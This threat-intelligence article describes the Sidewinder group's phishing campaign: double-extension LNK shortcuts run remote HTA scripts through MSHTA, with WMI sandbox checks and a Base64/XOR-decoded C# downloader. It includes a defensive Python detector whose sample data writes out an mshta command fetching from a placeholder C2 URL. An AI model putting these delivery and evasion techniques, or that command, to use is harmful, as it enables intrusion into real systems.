
The infamous APT-C-24 threat group, also known as Sidewinder or Rattlesnake, has evolved its attack strategies by implementing sophisticated LNK file-based phishing campaigns targeting the governmental, energy, military, and mining industries across South Asia.

Since gaining attention in 2012, this advanced persistent threat collective has transitioned from its conventional exploitation of Microsoft Office vulnerabilities, adopting a more clandestine tactic utilizing weaponized shortcut files to activate remote malicious scripts.

Recent attack samples uncovered by cybersecurity researchers demonstrate a meticulously executed campaign in which victims receive compressed folders containing three harmful LNK files, each created with a double extension such as “file 1.docx.lnk,” “file 2.docx.lnk,” and “file 3.docx.lnk.”

These misleading filenames are strategically designed to mimic legitimate document files, exploiting user confidence and enhancing the likelihood of execution.

The attackers have enhanced their delivery methods to optimize infection chances by offering multiple entry points within a single package.

Ctfiot analysts discovered that these LNK files abuse the Microsoft HTML Application Host (MSHTA) program to execute harmful scripts hosted on remote command-and-control servers.

The remote URLs show a unique pattern, concluding with parameters “yui=0,” “yui=1,” and “yui=2,” serving as distinctive identifiers for each variant while maintaining functionality across all three files.
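The two observable traits described above, document-masquerading LNK names and mshta.exe launched with a remote URL carrying a yui parameter, can be turned into a simple detection. The following is an added example, not code from the article or from Ctfiot; the process-creation events, the .invalid domain and the tag names are constructed for illustration.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed process-creation events in a Sysmon EventID 1 style (not real telemetry).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe https://example-c2.invalid/update.hta?yui=1",
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Program Files\Vendor\setup.hta",
     "parent": r"C:\Program Files\Vendor\setup.exe"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\a\notes.txt",
     "parent": r"C:\Windows\explorer.exe"},
]

# A shortcut whose name ends in a document extension followed by .lnk
DOUBLE_EXT_LNK = re.compile(r"\.(docx?|xlsx?|pptx?|pdf)\.lnk$", re.IGNORECASE)
REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

def is_double_extension_lnk(filename: str) -> bool:
    """True for names like 'file 1.docx.lnk' that masquerade as documents."""
    return DOUBLE_EXT_LNK.search(filename) is not None

def classify_event(event: dict) -> list:
    """Return detection tags for one process-creation event (empty list if benign)."""
    tags = []
    if not event["image"].lower().endswith(r"\mshta.exe"):
        return tags
    match = REMOTE_URL.search(event["cmdline"])
    if match:
        tags.append("mshta_remote_url")  # HTA fetched from the network, not a local file
        query = parse_qs(urlparse(match.group(0)).query)
        if "yui" in query:
            tags.append("yui_parameter")  # variant marker seen in this campaign
    if event["parent"].lower().endswith(r"\explorer.exe"):
        tags.append("parent_explorer")  # consistent with a user opening a shortcut
    return tags

def scan(events) -> list:
    """Return (cmdline, tags) for every event that produced at least one tag."""
    results = []
    for event in events:
        tags = classify_event(event)
        if tags:
            results.append((event["cmdline"], tags))
    return results
```

In practice the mshta_remote_url tag alone is the durable signal; the yui parameter is a campaign-specific marker that the operators can change at will.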

Attack Process (Source – Ctfiot)

The attack strategy reveals refined environmental awareness capabilities, with the malicious scripts conducting thorough system reconnaissance before advancing with payload distribution.

Upon activation, the initial JavaScript component executes anti-analysis inspections by interrogating system specifications through Windows Management Instrumentation (WMI), specifically inspecting processor core counts and physical memory allocation to differentiate between genuine target environments and security research sandboxes.

Advanced Evasion and Payload Deployment Techniques

The group’s technical expertise is apparent in their multi-layered obfuscation methodologies and conditional payload delivery systems.

The initial HTML application serves dual purposes by concurrently delivering decoy content to sustain victim deception while ensuring persistence through memory-resident attack components.

The harmful script queries the processor core count with “SELECT NumberOfCores FROM Win32_Processor” and requires at least two cores and 810MB of physical memory before moving forward with payload decryption.

Once environmental validations are successful, the script employs Base64 decoding coupled with XOR encryption to decrypt and reflectively load an extensively obfuscated C# downloader component.

This intricate payload conducts security software detection, searching for processes linked to Kaspersky, ESET, and various endpoint protection solutions before establishing communication with command-and-control infrastructure.

The attackers illustrate operational security awareness by swiftly rotating compromised domains and selectively delivering advanced payloads solely to victims fulfilling specific targeting criteria, considerably complicating security research efforts and threat detection activities.
